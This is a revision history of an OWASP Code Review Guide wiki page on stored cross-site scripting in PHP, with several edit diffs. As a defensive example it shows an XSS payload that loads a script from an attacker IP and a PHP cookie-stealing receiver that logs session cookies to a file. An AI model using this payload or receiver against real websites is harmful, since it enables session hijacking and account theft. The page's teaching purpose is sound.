CRV2 RevCodeStoredAntiPatternPHP - Revision history

Johanna Curiel at 20:14, 3 May 2014

2014-05-03T20:14:50Z

Johanna Curiel at 20:13, 3 May 2014

2014-05-03T20:13:56Z

Johanna Curiel at 20:12, 3 May 2014

2014-05-03T20:12:58Z

Johanna Curiel: Created page with "=PHP Stored Anti-pattern== Avoid stored Cross site script by validating input that attempts to save or store a XSS code in the database. You can use the OWASP PHP Security Fr..."

2014-05-03T20:10:41Z

Created page with "=PHP Stored Anti-pattern== Avoid stored Cross site script by validating input that attempts to save or store a XSS code in the database. You can use the OWASP PHP Security Fr..."

New page

=PHP Stored Anti-pattern==

Avoid stored Cross site script by validating input that attempts to save or store a XSS code in the database. You can use the OWASP PHP Security Framework to validate any attempt to submit information to the database when an malicious user attempts to submit information which contains XSS code.

Websites that do not validate properly XSS code that can be stored, is vulnerable to Cookie stealing sessions

Example, a malicious user will submit the following code in a (text) input field that does not validate input
<script src="http://192.168.120.20/stealcookie.php"></script>

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookiesteal.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>

And through this simple script, the user will be able to get the cookies delivered to his server.

==OWASP XSS Cheat sheets==

To get an overview of potential XSS code that can be maliciously submitted through web forms, use the OWASP XSS Cheat sheets online to test and determined potential vulnerabilities.

==OWASP PHP SEcurity Framework==
To know how to protect your site against this type of attacks, visit
https://www.owasp.org/index.php/OWASP_PHP_Security_Project

← Older revision		Revision as of 20:13, 3 May 2014
Line 1:		Line 1:
−	=PHP Stored Anti-pattern==	+	=PHP Stored Anti-pattern=

	Avoid stored Cross site script by validating input that attempts to save or store a XSS code in the database. You can use the OWASP PHP Security Framework to validate any attempt to submit information to the database when an malicious user attempts to submit information which contains XSS code.		Avoid stored Cross site script by validating input that attempts to save or store a XSS code in the database. You can use the OWASP PHP Security Framework to validate any attempt to submit information to the database when an malicious user attempts to submit information which contains XSS code.

@@ Line 3: / Line 3: @@
 Avoid stored Cross site script by validating input that attempts to save or store a XSS code in the database. You can use the OWASP PHP Security Framework to validate any attempt to submit information to the database when an malicious user attempts to submit information which contains XSS code.
-Websites that do not validate properly XSS code that can be stored, is vulnerable to Cookie stealing sessions
+Websites that do not validate properly XSS code that can be stored, are vulnerable to Cookie stealing sessions
 Example, a malicious user will submit the following code in a (text) input field that does not validate input

@@ Line 14: / Line 14: @@
     ?>
-  And through this simple script, the user will be able to get the cookies delivered to his server.
+And through this simple script, the user will be able to get the cookies delivered to his server.
 ==OWASP XSS Cheat sheets==
-  To get an overview of potential XSS code that can be maliciously submitted through web forms, use the OWASP XSS Cheat sheets online to test and determined potential    vulnerabilities.
+To get an overview of potential XSS code that can be maliciously submitted through web forms, use the OWASP XSS Cheat sheets online to test and determined potential    vulnerabilities.
-==OWASP PHP SEcurity Framework==
+==OWASP PHP Security Framework==
-To know how to protect your site against this type of attacks, visit
+To protect your site against these type of attacks you can implement the OWASP PHP security libraries in the php applcation, visit
 https://www.owasp.org/index.php/OWASP_PHP_Security_Project